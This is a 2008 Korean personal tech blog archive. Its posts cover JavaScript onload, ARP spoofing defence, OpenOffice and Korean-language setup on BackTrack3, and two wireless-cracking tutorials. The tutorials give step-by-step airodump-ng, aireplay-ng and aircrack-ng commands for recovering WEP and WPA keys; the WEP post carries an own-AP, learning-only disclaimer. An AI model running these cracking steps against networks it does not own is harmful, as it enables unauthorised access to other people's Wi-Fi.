2008년 7월 22일

javascript window.onload function 사용하기

window.onload() *js 파일을 삽입하고 특정 함수들이 페이지가 로딩되고 난 후 실행되도록 할때 쓰이는 함수이다.

사실 함수는 간단하지만 잘못쓰는경우 동작을 안하는 경우가 많다.

아래처럼 쓰도록 하자...

window.onload=function()
{
실행함수();
}

2008년 7월 17일

arp spoofing 확인 및 방어(static type)

arp table을 확인 현재 gateway의 mac address를 확인한다


arp spoofing공격이 시도되면 mac address가 변경된것을 확인 할 수 있다.


arp table에서 gateway entry 속성을 변경 dynamic에서 static로 변경한다.
- 이렇게 하면 단순한 arp spoofing은 막을수 있다.


dynamic Type으로 원상복구한 화면이다.

2008년 7월 16일

WPA crack backtrack3

Backtrack3가 정식 release된뒤로 계속 post하고 있습니다.

airodump로 wpa를 사용하는 대상 ap를 검색합니다.

airodump-ng rausb0


찾은 ap와 client의 4way handshake를 dump합니다.
Client의 접속을 기다려야 됩니다.

airodump-ng --channel 2 --bssid target_ap_mac --write weak-net rausb0


WPA handshake가 포착되었다면.. 좋은 사전파일을 준비하여 aircrack-ng로 ditionary attack을 실시합니다.
aricrack-ng -w D8.DIC weak-net-01.cap


최종적으로 WPA-key를 찾았습니다.



2008년 7월 15일

backtrack3에 openoffice설치

Openoffice를 다운받는다.


압축을 푼다.

bt tmp # tar -xzvf OOo_2.4.0_LinuxIntel_install_ko.tar.gz

압축푼 폴더로 이동
cd OOH680_m12_native_packed-1_ko.9286/

rpm디렉토리로 이동
cd RPMS/

rpm을 패키지파일로 변경
rpm2tgz *.rpm

tgz파일을 인스톨
installpkg *.tgz

cd /opt/openoffice.org2.4/program/

실행
soffice

kde의 메뉴편집기에 등록

kde아이콘 오른쪽 버튼에 메뉴편집기 선택
이름 : office
명령 : /opt/openoffice.org2.4/program/soffice
work path : /opt/openoffice.org2.4/program



실행화면

2008년 7월 13일

Webkey hacking

Webkey hacking하기

webkey를 해킹하는 방법은 생각보다 간단하다.
테스트는 반드시 본인의 AP로만 하도록 하고, 아래 기술된 내용은 반드시 학습목적으로만 사용하도록 하자.

준비 : Backtrack3

1단계
Scan AP






-무선랜카드를 확인한다. 여기서는 rausb0이다. 모드를 monitor로 변경해서 scan하자
※ KISMET을 실행시켜서 모드를 변경할 수 있다.(필자의 lan카드는 wusb54g이다. usb랜카드이며 vmware에서도 지원하고 backtrack에서도 HCL리스트에 좋은 랜카드로 소개되어 있다.)

kismet –c rt2500,rausb0,rt
※ 일반적으로 kismet 실행시킬때는 위와 같이 source를 잘 지정해주어야 한다.



관련파일들은 현재 디렉토리 밑에 저장된다. Kismet~.csv라는 파일을 본다.




알아보기 쉽게 Kwrite로 열었다.


kismet dump는 아래처럼 ESSID;BSSID;Info;Channel;Cloaked;Encryption 순서대로 나와있다.
여기서 WEP키를 사용하는 jihyun이라는 AP를 대상으로 삼겠다(필자의 테스트용 AP이다)


이제 패킷을 모을 준비를 하자

airodump-ng -c 채널명 --bssid AP의 MAC -w 캡쳐파일위치 rausb0

airodump-ng -c 2 --bssid 00:18:84:19:4B:7D -w /root/0712 rausb0





*open시스템인지 확인한다.
aireplay-ng -1 0 -e jihyun -a 00:18:84:19:4B:7D -h 00:1E:E5:A3:BC:BB rausb0


*replay패킷을 보낸다.

aireplay-ng -3 -b 00:18:84:19:4B:7D -h 00:1E:E5:A3:BC:BB rausb0


*Packet을 gathering한다 128bit는 최소 60000 IV정도를 수집해야 한다.

패킷수집이 다 되었다.
*capture된 패킷을 가지고 aircrack-ng를 이용해 key를 찾는다.

aircrack-ng /root/0712-01.cap
실재 webkey와 일치한다.
Successful!




Backtrack3에서의 한글사용

backtrack3가 정식으로 출시되었다. 아래 링크에서 받을수 있다.

http://www.remote-exploit.org/backtrack_download.html

slackware기반의 깔끔한 livecd이며 각종 pen testing tool들이 가득하며, 이번버전에는 vmware 이미지 까지 같이 출시해서 따로 guest os로 인스톨하는 수고를 덜어 주었다. 그런데, 이 backtrack이 나온 지 얼마 안된livecd이기 때문에.. 한글화 되어있지 않고 관련 정보도 없다. backtrack은livecd로 주로 사용하고.. 작업도중 web검색등은 필요한 경우도 있을텐데 한글이 되지 않으므로 작업 시 불편함이 많다. 그래서. slackware와 slax한글 패키지를 이용해서 한글 입출력을 가능하게 해봤다. 이제 backtrack도 한글화 해서 불편 없이 쓰도록 하자.
Livecd로 사용할때는 첨부의 파일을 /Bt/modules로 카피하여 boot module로 등록하면 되고 나 같은 경우는 vmware image로 사용하고 있기 때문에 실제로 install해야 한다. 앞으로는 backtrack3를 계속 vmware상에서 사용할 것이기 때문에 vmware와 관련된 내용도 많이 올릴 것이다. 여기서 잠깐 vmware에 대해서 집고 넘어가보겠다.. vmware를 조금만 잘 이용해 보면 정말 유용한 도구로 바꾸어서 사용할 수 있다. VMWARE의 강력함은 단순히 가상화를 통한 타 OS를 쓸수 있는 것 뿐이 아니다. 여러가지 OS를 real과 virtual Network를 통해 구성할 수 있다는 점이다. 이 장점을 이용하면. 실재로 방화벽 및 프락시등을 포함한 간단한 중소기업 인프라 정도는 구축할 수 있다. 필자는 vmware-server버전으로 20대정도로 구성된 인프라 를 구축해 본적이 있다. 조금 버벅 거리긴 하지만. 잘 customizing한다면 훌륭한 test bed로 사용할 수 있다.

각설하고 backtrack에서 한글 입출력을 가능하도록 관련 패키지를 설치하겠다. 여기서는 lzm(slax boot모듈)과 iinstall패키지를 사용하고 slackware의 iinstall패키지는 installinstall, removeinstall 명령으로 바로 backtrack에서 사용할 수 있다.
한글입력에는 scim을 사용하는데 backtrack3에는 기본적으로 locale이 C와 POSIX밖에 없다. 이부분 때문에 조금 삽질했는데. 기존의 lzm모듈을 설치하는 명령어 하나로 끝냈다.

Part1패키지준비
우선 시작하기 전에 아래의 패키지가 필요하다.

윈도우상으로 받아놓고 mount해서 윈도우 공유폴더로 접근해도 될것이다. 물론 backtrack에서 바로 다운로드 해도 된다.

mount명령
mount.cifs //192.168.0.***/share /mnt/share –o username=userid

폰트
arita-ttf-1.0-noarch-2han.lzm
alee-fonts-ttf-11[1].5-noarch-1han.tgz
unfonts-ttf-1[1].0.1-noarch-4han.tgz

scim관련
scim-1.4.7-i486-13han.lzm
scim-hangul-0.3.1-i486-1han.lzm
libhangul-0.0.5-i686-1.lzm

KDE한글화
kde-i18n-ko-3.5.7-noarch-1.lzm

한글 로케일
locale_ko.lzm

part2 – 패키지 설치

2-1.
lzm2dirarita-ttf-1.0-noarch-2han.lzm /
installpkgalee-fonts-ttf-11[1].5-noarch-1han.tgz
installpkgunfonts-ttf-1[1].0.1-noarch-4han.tgz

2-2.
lzm2dir scim-1.4.7-i486-13han.lzm /
lzm2dir scim-hangul-0.3.1-i486-1han.lzm /
lzm2dir libhangul-0.0.5-i686-1.lzm /

2-3.
lzm2dir kde-i18n-ko-3.5.7-noarch-1.lzm /

2-4.
lzm2dir locale_ko.lzm /

Part3 Verification

우선 /etc/profile.d/lang.sh를 확인해보자 ’export LANG=ko_KR’과LC=’ko_KR’ 로 되어있는지 보자.
나중에 글자가 올바르게 표시되지 않는다면 이부분을 ko_KR.utf8 또는 ko_KR.euckr로 바꾸어 보자.

locale명령을 통해 locale에 한글 로케일이 추가 되었는지 확인해 보자
locale -a 를 통해 현재 사용가능한 locale가 무엇인지도 확인할 수 있다.


firefox의 글자체를 조정해 보자.

backtrack3